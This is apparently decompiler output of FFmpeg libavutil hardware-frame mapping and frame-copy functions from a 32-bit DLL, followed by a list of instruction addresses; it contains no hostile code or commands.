                                                                      				signed int _t300;
                                                                      				signed int _t302;
                                                                      				signed int _t304;
                                                                      				signed short* _t309;
                                                                      				signed short* _t310;
                                                                      				int _t314;
                                                                      				signed int _t324;
                                                                      				intOrPtr* _t326;
                                                                      				intOrPtr _t327;
                                                                      				signed char _t335;
                                                                      				short* _t336;
                                                                      				signed char _t337;
                                                                      				short* _t338;
                                                                      				signed int _t339;
                                                                      				signed int _t341;
                                                                      				char* _t343;
                                                                      				signed int _t345;
                                                                      				signed int _t347;
                                                                      				signed int _t349;
                                                                      				signed int _t352;
                                                                      				void* _t353;
                                                                      				void* _t356;
                                                                      				signed int _t362;
                                                                      				signed int _t364;
                                                                      				signed int _t368;
                                                                      				signed int _t370;
                                                                      				signed int _t373;
                                                                      				signed short* _t374;
                                                                      				signed short* _t375;
                                                                      				signed int _t376;
                                                                      				void* _t378;
                                                                      				signed int _t381;
                                                                      				intOrPtr _t382;
                                                                      				signed int _t383;
                                                                      				signed int _t385;
                                                                      				signed int _t388;
                                                                      				void* _t389;
                                                                      				intOrPtr* _t390;
                                                                      				signed int* _t392;
                                                                      				signed int* _t396;
                                                                      
                                                                      				_t390 = _t389 - 0x4c;
                                                                      				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
                                                                      				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
                                                                      				_t343 =  *(_t390 + 0x54);
                                                                      				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
                                                                      				_t289 =  *((intOrPtr*)(_t390 + 0x50));
                                                                      				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
                                                                      				 *(_t390 + 0x28) =  *(_t390 + 0x58);
                                                                      				_t383 =  *(_t289 + 0x50);
                                                                      				_t362 =  *(_t289 + 0x128);
                                                                      				 *(_t390 + 0x24) = _t383;
                                                                      				if(_t343[0x128] == 0) {
                                                                      					_t213 = _t362;
                                                                      					goto L83;
                                                                      				} else {
                                                                      					__eflags = __esi;
                                                                      					__edx =  *(__eax + 4);
                                                                      					if(__esi == 0) {
                                                                      						__eax = __edi[0x50];
                                                                      						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                                      						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
                                                                      							goto L91;
                                                                      						} else {
                                                                      							 *(__edx + 4) =  *( *(__edx + 4));
                                                                      							__eax =  *( *( *(__edx + 4)) + 0x50);
                                                                      							__eflags = __eax;
                                                                      							if(__eax == 0) {
                                                                      								goto L91;
                                                                      							} else {
                                                                      								goto L79;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						__eax =  *(__esi + 4);
                                                                      						__eflags = __eax - __edx;
                                                                      						if(__eax == __edx) {
                                                                      							__ecx =  *(__eax + 0x28);
                                                                      							__eflags = __edi[0x50] -  *(__eax + 0x28);
                                                                      							if(__edi[0x50] !=  *(__eax + 0x28)) {
                                                                      								goto L66;
                                                                      							} else {
                                                                      								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
                                                                      								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
                                                                      									goto L66;
                                                                      								} else {
                                                                      									goto L89;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							L66:
                                                                      							__ecx =  *(__edx + 4);
                                                                      							__esp[0xb] = __ecx;
                                                                      							__ecx = __ecx[0xc];
                                                                      							__eflags = __ecx;
                                                                      							if(__ecx == 0) {
                                                                      								L68:
                                                                      								__ecx = __edi[0x50];
                                                                      								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
                                                                      								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
                                                                      									__esp[0xb] =  *(__esp[0xb]);
                                                                      									__eax =  *( *(__esp[0xb]) + 0x50);
                                                                      									__eflags = __eax;
                                                                      									if(__eax != 0) {
                                                                      										L79:
                                                                      										__esp[2] = __edi;
                                                                      										__ecx = __esp[0xa];
                                                                      										__esp[1] = __ebx;
                                                                      										 *__esp = __edx;
                                                                      										__esp[3] = __esp[0xa];
                                                                      										__eax =  *__eax();
                                                                      										__eflags = __eax;
                                                                      										if(__eax >= 0) {
                                                                      											goto L76;
                                                                      										} else {
                                                                      											__eflags = __eax - 0xffffffd8;
                                                                      											if(__eax != 0xffffffd8) {
                                                                      												goto L73;
                                                                      											} else {
                                                                      												__eax =  *(__ebx + 0x128);
                                                                      												L83:
                                                                      												__eflags = _t213;
                                                                      												if(_t213 == 0) {
                                                                      													goto L91;
                                                                      												} else {
                                                                      													 *(_t390 + 0x24) =  *(_t289 + 0x50);
                                                                      													goto L85;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										__eax = __esi;
                                                                      										L85:
                                                                      										_t215 =  *((intOrPtr*)(_t213 + 4));
                                                                      										goto L69;
                                                                      									}
                                                                      								} else {
                                                                      									L69:
                                                                      									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
                                                                      									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
                                                                      										L91:
                                                                      										_t214 = 0xffffffd8;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
                                                                      										__eflags = _t324;
                                                                      										if(_t324 == 0) {
                                                                      											goto L91;
                                                                      										} else {
                                                                      											 *(_t390 + 8) = _t343;
                                                                      											 *((intOrPtr*)(_t390 + 4)) = _t289;
                                                                      											 *_t390 = _t215;
                                                                      											 *(_t390 + 0xc) =  *(_t390 + 0x28);
                                                                      											_t214 =  *_t324();
                                                                      											__eflags = _t214;
                                                                      											if(_t214 >= 0) {
                                                                      												goto L76;
                                                                      											} else {
                                                                      												__eflags = _t214 - 0xffffffd8;
                                                                      												if(_t214 == 0xffffffd8) {
                                                                      													goto L91;
                                                                      												} else {
                                                                      													L73:
                                                                      													__eflags = _t362;
                                                                      													if(_t362 == 0) {
                                                                      														L75:
                                                                      														 *(_t390 + 0x24) = _t214;
                                                                      														__eflags = 0;
                                                                      														 *(_t289 + 0x128) = 0;
                                                                      														 *_t390 = _t289;
                                                                      														E1001B300();
                                                                      														_t214 =  *(_t390 + 0x24);
                                                                      														 *(_t289 + 0x128) = _t362;
                                                                      														 *(_t289 + 0x50) = _t383;
                                                                      														goto L76;
                                                                      													} else {
                                                                      														__eflags =  *(_t289 + 0x128) - _t362;
                                                                      														if( *(_t289 + 0x128) != _t362) {
                                                                      															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
                                                                      															__eflags = 0;
                                                                      															 *((intOrPtr*)(_t390 + 4)) = 0;
                                                                      															 *_t390 = 0;
                                                                      															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
                                                                      															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
                                                                      															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
                                                                      															E10026560();
                                                                      															abort();
                                                                      															_push(_t362);
                                                                      															_push(_t289);
                                                                      															_t392 = _t390 - 0x34;
                                                                      															_t219 = _t392[0x10];
                                                                      															_t291 = _t392[0x11];
                                                                      															_t364 =  *(_t219 + 4);
                                                                      															_t326 =  *((intOrPtr*)(_t364 + 4));
                                                                      															_t306 =  *(_t326 + 0xc);
                                                                      															__eflags =  *(_t326 + 0xc);
                                                                      															if( *(_t326 + 0xc) == 0) {
                                                                      																_t327 =  *_t326;
                                                                      																_t307 =  *(_t327 + 0x3c);
                                                                      																__eflags =  *(_t327 + 0x3c);
                                                                      																if( *(_t327 + 0x3c) == 0) {
                                                                      																	_t220 = 0xffffffd8;
                                                                      																	goto L103;
                                                                      																} else {
                                                                      																	__eflags =  *(_t364 + 0x1c);
                                                                      																	if( *(_t364 + 0x1c) == 0) {
                                                                      																		_t220 = 0xffffffea;
                                                                      																		goto L103;
                                                                      																	} else {
                                                                      																		 *_t392 = _t219;
                                                                      																		_t221 = L10009FC0(_t291, _t307);
                                                                      																		 *(_t291 + 0x128) = _t221;
                                                                      																		__eflags = _t221;
                                                                      																		if(_t221 == 0) {
                                                                      																			goto L102;
                                                                      																		} else {
                                                                      																			_t392[1] = _t291;
                                                                      																			 *_t392 = _t364;
                                                                      																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
                                                                      																			__eflags = _t224;
                                                                      																			if(_t224 < 0) {
                                                                      																				_t392[7] = _t224;
                                                                      																				 *_t392 = _t291 + 0x128;
                                                                      																				E1000A000(_t291 + 0x128, _t364);
                                                                      																				_t220 = _t392[7];
                                                                      																				goto L103;
                                                                      																			} else {
                                                                      																				 *(_t291 + 0x40) = _t291;
                                                                      																				__eflags = 0;
                                                                      																				return 0;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
                                                                      																 *_t392 = _t219;
                                                                      																_t227 = L10009FC0(_t291, _t306);
                                                                      																 *(_t291 + 0x128) = _t227;
                                                                      																__eflags = _t227;
                                                                      																if(_t227 == 0) {
                                                                      																	L102:
                                                                      																	_t220 = 0xfffffff4;
                                                                      																	goto L103;
                                                                      																} else {
                                                                      																	_t228 = L1001AC40(_t291, _t343, _t364);
                                                                      																	_t392[0xb] = _t228;
                                                                      																	__eflags = _t228;
                                                                      																	if(_t228 == 0) {
                                                                      																		goto L102;
                                                                      																	} else {
                                                                      																		_t392[1] = _t228;
                                                                      																		_t392[2] = 0;
                                                                      																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
                                                                      																		 *_t392 = _t230;
                                                                      																		L96();
                                                                      																		__eflags = _t230;
                                                                      																		if(_t230 < 0) {
                                                                      																			L109:
                                                                      																			_t392[7] = _t230;
                                                                      																			 *_t392 =  &(_t392[0xb]);
                                                                      																			L1001ADB0(_t291);
                                                                      																			return _t392[7];
                                                                      																		} else {
                                                                      																			 *_t392 = _t291;
                                                                      																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
                                                                      																			_t392[1] = _t392[0xb];
                                                                      																			_t230 = E1001E450(_t291, _t343, _t364);
                                                                      																			__eflags = _t230;
                                                                      																			if(_t230 == 0) {
                                                                      																				goto L109;
                                                                      																			} else {
                                                                      																				_t392[3] = _t230;
                                                                      																				_t392[7] = _t230;
                                                                      																				_t392[1] = 0x10;
                                                                      																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
                                                                      																				 *_t392 = _t364;
                                                                      																				E10026560();
                                                                      																				 *_t392 =  &(_t392[0xb]);
                                                                      																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                                      																				_t220 = _t392[7];
                                                                      																				L103:
                                                                      																				return _t220;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															goto L75;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = __ecx[4] - __eax;
                                                                      								if(__ecx[4] == __eax) {
                                                                      									L89:
                                                                      									__eax = __edi[0xb8];
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										 *__esp = __edx;
                                                                      										__ecx = "Invalid mapping found when attempting unmap.\n";
                                                                      										__ebx = 0x10;
                                                                      										__esp[2] = "Invalid mapping found when attempting unmap.\n";
                                                                      										__esp[1] = 0x10;
                                                                      										E10026560() = 0xffffffea;
                                                                      										L76:
                                                                      										return _t214;
                                                                      									} else {
                                                                      										__esi =  *(__eax + 4);
                                                                      										__eax = E1001B300(__ebx);
                                                                      										__edi = __esp[0x11];
                                                                      										__ebp = __esp[0x12];
                                                                      										__eax =  *__esi;
                                                                      										__esp[0x14] = __ebx;
                                                                      										__esi = __esp[0x10];
                                                                      										__ebx = __esp[0xf];
                                                                      										__esp[0x15] = __eax;
                                                                      										__esp =  &(__esp[0x13]);
                                                                      										_push(_t383);
                                                                      										_push(_t343);
                                                                      										_push(_t362);
                                                                      										_t396 = _t390 - 0x1c;
                                                                      										_t297 = _t396[0xd];
                                                                      										_t385 = _t396[0xc];
                                                                      										_t345 = _t297 + 0x148;
                                                                      										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
                                                                      										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
                                                                      										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
                                                                      										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
                                                                      										 *(_t385 + 0x120) =  *(_t297 + 0x120);
                                                                      										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
                                                                      										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
                                                                      										 *_t396 = _t345;
                                                                      										if(L1000EC10(_t289) == 0) {
                                                                      											_t283 =  *(_t297 + 0xb4);
                                                                      											_t341 =  *(_t297 + 0xb0);
                                                                      											if((_t283 | _t341) != 0) {
                                                                      												_t396[2] = _t283;
                                                                      												_t396[1] = _t341;
                                                                      												 *_t396 = _t385 + 0x148;
                                                                      												E1000D1B0();
                                                                      											} else {
                                                                      												 *(_t385 + 0x14c) =  *(_t297 + 0x120);
                                                                      												 *(_t385 + 0x148) = 0;
                                                                      											}
                                                                      										}
                                                                      										_t308 = 0;
                                                                      										_t247 = L1001A6C0(_t385, 0, _t297, 0);
                                                                      										_t368 = _t247;
                                                                      										if(_t247 < 0) {
                                                                      											L20:
                                                                      											E1001A460(_t385);
                                                                      											return _t368;
                                                                      										} else {
                                                                      											 *_t396 = _t345;
                                                                      											if(L1000EC10() != 0) {
                                                                      												_t396[1] = _t345;
                                                                      												 *_t396 = _t385 + 0x148;
                                                                      												_t253 = E1000D340();
                                                                      												__eflags = _t253;
                                                                      												_t368 = _t253;
                                                                      												if(_t253 < 0) {
                                                                      													goto L20;
                                                                      												} else {
                                                                      													_t254 =  *(_t297 + 0xb8);
                                                                      													__eflags = _t254;
                                                                      													if(_t254 != 0) {
                                                                      														goto L7;
                                                                      													} else {
                                                                      														goto L33;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												_t254 =  *(_t297 + 0xb8);
                                                                      												if(_t254 == 0) {
                                                                      													L33:
                                                                      													 *_t396 = _t385;
                                                                      													_t396[1] = 0;
                                                                      													_t281 = L1001ADF0();
                                                                      													__eflags = _t281;
                                                                      													_t368 = _t281;
                                                                      													if(_t281 < 0) {
                                                                      														goto L20;
                                                                      													} else {
                                                                      														_t396[1] = _t297;
                                                                      														 *_t396 = _t385;
                                                                      														_t282 = L1001B8D0();
                                                                      														__eflags = _t282;
                                                                      														_t368 = _t282;
                                                                      														if(_t282 < 0) {
                                                                      															goto L20;
                                                                      														} else {
                                                                      															goto L35;
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													L7:
                                                                      													_t370 = 0;
                                                                      													L9:
                                                                      													while(1) {
                                                                      														if(_t254 == 0) {
                                                                      															L11:
                                                                      															_t370 = _t370 + 1;
                                                                      															if(_t370 != 8) {
                                                                      																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
                                                                      																continue;
                                                                      															} else {
                                                                      																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
                                                                      																	L22:
                                                                      																	_t255 =  *(_t297 + 0x128);
                                                                      																	__eflags = _t255;
                                                                      																	if(_t255 == 0) {
                                                                      																		L24:
                                                                      																		__eflags =  *(_t297 + 0x40) - _t297;
                                                                      																		if( *(_t297 + 0x40) == _t297) {
                                                                      																			 *(_t385 + 0x40) = _t385;
                                                                      																			goto L38;
                                                                      																		} else {
                                                                      																			_t352 =  *(_t385 + 0x14c);
                                                                      																			_t368 = 0xffffffea;
                                                                      																			__eflags = _t352;
                                                                      																			if(_t352 == 0) {
                                                                      																				goto L20;
                                                                      																			} else {
                                                                      																				_t396[1] = _t352;
                                                                      																				 *_t396 = 4;
                                                                      																				_t267 = L10028EC0();
                                                                      																				 *(_t385 + 0x40) = _t267;
                                                                      																				__eflags = _t267;
                                                                      																				if(_t267 == 0) {
                                                                      																					goto L19;
                                                                      																				} else {
                                                                      																					_t314 = _t352 * 4;
                                                                      																					_t378 =  *(_t297 + 0x40);
                                                                      																					_t353 = _t267;
                                                                      																					__eflags = _t314 - 8;
                                                                      																					if(_t314 >= 8) {
                                                                      																						__eflags = _t267 & 0x00000001;
                                                                      																						if((_t267 & 0x00000001) != 0) {
                                                                      																							_t268 =  *_t378 & 0x000000ff;
                                                                      																							_t353 = _t353 + 1;
                                                                      																							_t378 = _t378 + 1;
                                                                      																							_t314 = _t314 - 1;
                                                                      																							 *(_t353 - 1) = _t268;
                                                                      																						}
                                                                      																						__eflags = _t353 & 0x00000002;
                                                                      																						if((_t353 & 0x00000002) != 0) {
                                                                      																							_t269 =  *_t378 & 0x0000ffff;
                                                                      																							_t353 = _t353 + 2;
                                                                      																							_t378 = _t378 + 2;
                                                                      																							_t314 = _t314 - 2;
                                                                      																							 *(_t353 - 2) = _t269;
                                                                      																						}
                                                                      																						__eflags = _t353 & 0x00000004;
                                                                      																						if((_t353 & 0x00000004) == 0) {
                                                                      																							goto L28;
                                                                      																						} else {
                                                                      																							_t356 = _t353 + 4;
                                                                      																							 *(_t356 - 4) =  *_t378;
                                                                      																							memcpy(_t356, _t378 + 4, _t314 - 4);
                                                                      																							_t396 =  &(_t396[3]);
                                                                      																							goto L38;
                                                                      																						}
                                                                      																						L50:
                                                                      																						_t338 = _t337 + _t262;
                                                                      																						_t375 = _t374 + _t262;
                                                                      																						_t263 = 0;
                                                                      																						__eflags = _t349 & 0x00000002;
                                                                      																						if((_t349 & 0x00000002) != 0) {
                                                                      																							 *_t338 =  *_t375 & 0x0000ffff;
                                                                      																							_t263 = 2;
                                                                      																						}
                                                                      																						__eflags = _t349 & 0x00000001;
                                                                      																						if((_t349 & 0x00000001) == 0) {
                                                                      																							L35:
                                                                      																							_t376 = 0;
                                                                      																							__eflags = 0;
                                                                      																						} else {
                                                                      																							_t376 = 0;
                                                                      																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
                                                                      																						}
                                                                      																						return _t376;
                                                                      																						goto L113;
                                                                      																					} else {
                                                                      																						L28:
                                                                      																						memcpy(_t353, _t378, _t314);
                                                                      																						_t396 =  &(_t396[3]);
                                                                      																					}
                                                                      																					L38:
                                                                      																					__eflags = _t385 & 0x00000001;
                                                                      																					_t335 = _t385;
                                                                      																					_t309 = _t297;
                                                                      																					_t347 = 0x20;
                                                                      																					if((_t385 & 0x00000001) != 0) {
                                                                      																						_t335 = _t385 + 1;
                                                                      																						_t347 = 0x1f;
                                                                      																						_t309 = _t297 + 1;
                                                                      																						 *_t385 =  *_t297 & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t335 & 0x00000002;
                                                                      																					if((_t335 & 0x00000002) != 0) {
                                                                      																						_t257 =  *_t309 & 0x0000ffff;
                                                                      																						_t335 = _t335 + 2;
                                                                      																						_t309 =  &(_t309[1]);
                                                                      																						_t347 = _t347 - 2;
                                                                      																						 *(_t335 - 2) = _t257;
                                                                      																					}
                                                                      																					_t396[0xd] = _t297;
                                                                      																					_t258 = 0;
                                                                      																					_t373 = _t347 & 0xfffffffc;
                                                                      																					__eflags = _t373;
                                                                      																					do {
                                                                      																						 *(_t335 + _t258) =  *(_t309 + _t258);
                                                                      																						_t258 = _t258 + 4;
                                                                      																						__eflags = _t258 - _t373;
                                                                      																					} while (_t258 < _t373);
                                                                      																					_t336 = _t335 + _t258;
                                                                      																					_t310 = _t309 + _t258;
                                                                      																					_t300 = _t396[0xd];
                                                                      																					_t259 = 0;
                                                                      																					__eflags = _t347 & 0x00000002;
                                                                      																					if((_t347 & 0x00000002) != 0) {
                                                                      																						 *_t336 =  *_t310 & 0x0000ffff;
                                                                      																						_t259 = 2;
                                                                      																					}
                                                                      																					__eflags = _t347 & 0x00000001;
                                                                      																					if((_t347 & 0x00000001) != 0) {
                                                                      																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t385 & 0x00000001;
                                                                      																					_t349 = 0x20;
                                                                      																					_t337 = _t385 + 0x20;
                                                                      																					_t374 = _t300 + 0x20;
                                                                      																					if((_t385 & 0x00000001) != 0) {
                                                                      																						_t337 = _t385 + 0x21;
                                                                      																						_t349 = 0x1f;
                                                                      																						_t374 = _t300 + 0x21;
                                                                      																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t337 & 0x00000002;
                                                                      																					if((_t337 & 0x00000002) != 0) {
                                                                      																						_t261 =  *_t374 & 0x0000ffff;
                                                                      																						_t337 = _t337 + 2;
                                                                      																						_t374 =  &(_t374[1]);
                                                                      																						_t349 = _t349 - 2;
                                                                      																						 *(_t337 - 2) = _t261;
                                                                      																					}
                                                                      																					_t262 = 0;
                                                                      																					_t302 = _t349 & 0xfffffffc;
                                                                      																					__eflags = _t302;
                                                                      																					do {
                                                                      																						 *(_t337 + _t262) =  *(_t374 + _t262);
                                                                      																						_t262 = _t262 + 4;
                                                                      																						__eflags = _t262 - _t302;
                                                                      																					} while (_t262 < _t302);
                                                                      																					goto L50;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	} else {
                                                                      																		 *_t396 = _t255;
                                                                      																		_t273 = L10009FC0(_t297, _t308);
                                                                      																		 *(_t385 + 0x128) = _t273;
                                                                      																		__eflags = _t273;
                                                                      																		if(_t273 == 0) {
                                                                      																			goto L19;
                                                                      																		} else {
                                                                      																			goto L24;
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	_t308 = 4;
                                                                      																	_t396[1] = 4;
                                                                      																	 *_t396 =  *(_t297 + 0xdc);
                                                                      																	_t275 = E100291F0();
                                                                      																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
                                                                      																	if(_t275 == 0) {
                                                                      																		goto L19;
                                                                      																	} else {
                                                                      																		_t339 =  *(_t297 + 0xdc);
                                                                      																		 *(_t385 + 0xdc) = _t339;
                                                                      																		if(_t339 <= 0) {
                                                                      																			goto L22;
                                                                      																		} else {
                                                                      																			_t396[0xc] = _t385;
                                                                      																			_t388 = _t297;
                                                                      																			_t304 = 0;
                                                                      																			while(1) {
                                                                      																				_t381 = _t304 * 4;
                                                                      																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
                                                                      																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
                                                                      																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
                                                                      																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
                                                                      																					break;
                                                                      																				}
                                                                      																				_t304 = _t304 + 1;
                                                                      																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
                                                                      																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
                                                                      																					_t297 = _t388;
                                                                      																					_t385 = _t396[0xc];
                                                                      																					goto L22;
                                                                      																				} else {
                                                                      																					continue;
                                                                      																				}
                                                                      																				goto L113;
                                                                      																			}
                                                                      																			_t385 = _t396[0xc];
                                                                      																			goto L19;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *_t396 = _t254;
                                                                      															_t280 = L10009FC0(_t297, _t308);
                                                                      															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
                                                                      															if(_t280 == 0) {
                                                                      																L19:
                                                                      																_t368 = 0xfffffff4;
                                                                      																goto L20;
                                                                      															} else {
                                                                      																goto L11;
                                                                      															}
                                                                      														}
                                                                      														goto L113;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									goto L68;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L113:
                                                                      			}

                                                                      0x1001e760
                                                                      0x1001e762
                                                                      0x1001e765
                                                                      0x1001e767
                                                                      0x1001e7e5
                                                                      0x00000000
                                                                      0x1001e769
                                                                      0x1001e76c
                                                                      0x1001e76e
                                                                      0x1001e7db
                                                                      0x00000000
                                                                      0x1001e770
                                                                      0x1001e770
                                                                      0x1001e773
                                                                      0x1001e778
                                                                      0x1001e77e
                                                                      0x1001e780
                                                                      0x00000000
                                                                      0x1001e782
                                                                      0x1001e787
                                                                      0x1001e78b
                                                                      0x1001e78e
                                                                      0x1001e791
                                                                      0x1001e793
                                                                      0x1001e7c0
                                                                      0x1001e7ca
                                                                      0x1001e7cd
                                                                      0x1001e7d2
                                                                      0x00000000
                                                                      0x1001e795
                                                                      0x1001e795
                                                                      0x1001e79b
                                                                      0x1001e79f
                                                                      0x1001e79f
                                                                      0x1001e793
                                                                      0x1001e780
                                                                      0x1001e76e
                                                                      0x1001e6ae
                                                                      0x1001e6b1
                                                                      0x1001e6b4
                                                                      0x1001e6b7
                                                                      0x1001e6bc
                                                                      0x1001e6c2
                                                                      0x1001e6c4
                                                                      0x1001e750
                                                                      0x1001e750
                                                                      0x00000000
                                                                      0x1001e6ca
                                                                      0x1001e6ca
                                                                      0x1001e6cf
                                                                      0x1001e6d3
                                                                      0x1001e6d5
                                                                      0x00000000
                                                                      0x1001e6d7
                                                                      0x1001e6d7
                                                                      0x1001e6dd
                                                                      0x1001e6e4
                                                                      0x1001e6e7
                                                                      0x1001e6ea
                                                                      0x1001e6ef
                                                                      0x1001e6f1
                                                                      0x1001e7a0
                                                                      0x1001e7a0
                                                                      0x1001e7a8
                                                                      0x1001e7ab
                                                                      0x1001e7b9
                                                                      0x1001e6f7
                                                                      0x1001e6fd
                                                                      0x1001e700
                                                                      0x1001e708
                                                                      0x1001e70c
                                                                      0x1001e711
                                                                      0x1001e713
                                                                      0x00000000
                                                                      0x1001e719
                                                                      0x1001e719
                                                                      0x1001e722
                                                                      0x1001e72b
                                                                      0x1001e72f
                                                                      0x1001e733
                                                                      0x1001e736
                                                                      0x1001e73f
                                                                      0x1001e742
                                                                      0x1001e747
                                                                      0x1001e755
                                                                      0x1001e75a
                                                                      0x1001e75a
                                                                      0x1001e713
                                                                      0x1001e6f1
                                                                      0x1001e6d5
                                                                      0x1001e6c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001e510
                                                                      0x1001e508
                                                                      0x1001e500
                                                                      0x1001e4fb
                                                                      0x1001e4de
                                                                      0x1001e4ce
                                                                      0x1001e4b2
                                                                      0x1001e4b2
                                                                      0x1001e4b5
                                                                      0x1001e5d0
                                                                      0x1001e5d0
                                                                      0x1001e5d6
                                                                      0x1001e5d8
                                                                      0x1001e632
                                                                      0x1001e635
                                                                      0x1001e63a
                                                                      0x1001e63f
                                                                      0x1001e643
                                                                      0x1001e64c
                                                                      0x1001e537
                                                                      0x1001e54a
                                                                      0x1001e5da
                                                                      0x1001e5da
                                                                      0x1001e5e0
                                                                      0x1001e5e5
                                                                      0x1001e5e9
                                                                      0x1001e5ed
                                                                      0x1001e5ef
                                                                      0x1001e5f3
                                                                      0x1001e5f7
                                                                      0x1001e5fb
                                                                      0x1001e5ff
                                                                      0x1001bc40
                                                                      0x1001bc41
                                                                      0x1001bc42
                                                                      0x1001bc44
                                                                      0x1001bc47
                                                                      0x1001bc4b
                                                                      0x1001bc52
                                                                      0x1001bc5e
                                                                      0x1001bc64
                                                                      0x1001bc6a
                                                                      0x1001bc70
                                                                      0x1001bc79
                                                                      0x1001bc85
                                                                      0x1001bc8b
                                                                      0x1001bc91
                                                                      0x1001bc9b
                                                                      0x1001bc9d
                                                                      0x1001bca3
                                                                      0x1001bcad
                                                                      0x1001be70
                                                                      0x1001be7a
                                                                      0x1001be7e
                                                                      0x1001be81
                                                                      0x1001bcb3
                                                                      0x1001bcb9
                                                                      0x1001bcc1
                                                                      0x1001bcc1
                                                                      0x1001bcad
                                                                      0x1001bcc7
                                                                      0x1001bccd
                                                                      0x1001bcd4
                                                                      0x1001bcd6
                                                                      0x1001bdb8
                                                                      0x1001bdba
                                                                      0x1001bdc8
                                                                      0x1001bcdc
                                                                      0x1001bcdc
                                                                      0x1001bce6
                                                                      0x1001be40
                                                                      0x1001be4a
                                                                      0x1001be4d
                                                                      0x1001be52
                                                                      0x1001be54
                                                                      0x1001be56
                                                                      0x00000000
                                                                      0x1001be5c
                                                                      0x1001be5c
                                                                      0x1001be62
                                                                      0x1001be64
                                                                      0x00000000
                                                                      0x1001be6a
                                                                      0x00000000
                                                                      0x1001be6a
                                                                      0x1001be64
                                                                      0x1001bcec
                                                                      0x1001bcec
                                                                      0x1001bcf4
                                                                      0x1001be90
                                                                      0x1001be90
                                                                      0x1001be95
                                                                      0x1001be99
                                                                      0x1001be9e
                                                                      0x1001bea0
                                                                      0x1001bea2
                                                                      0x00000000
                                                                      0x1001bea8
                                                                      0x1001bea8
                                                                      0x1001beac
                                                                      0x1001beaf
                                                                      0x1001beb4
                                                                      0x1001beb6
                                                                      0x1001beb8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001beb8
                                                                      0x1001bcfa
                                                                      0x1001bcfa
                                                                      0x1001bcfa
                                                                      0x00000000
                                                                      0x1001bd07
                                                                      0x1001bd09
                                                                      0x1001bd22
                                                                      0x1001bd22
                                                                      0x1001bd26
                                                                      0x1001bd00
                                                                      0x00000000
                                                                      0x1001bd28
                                                                      0x1001bd30
                                                                      0x1001bdd6
                                                                      0x1001bdd6
                                                                      0x1001bddc
                                                                      0x1001bdde
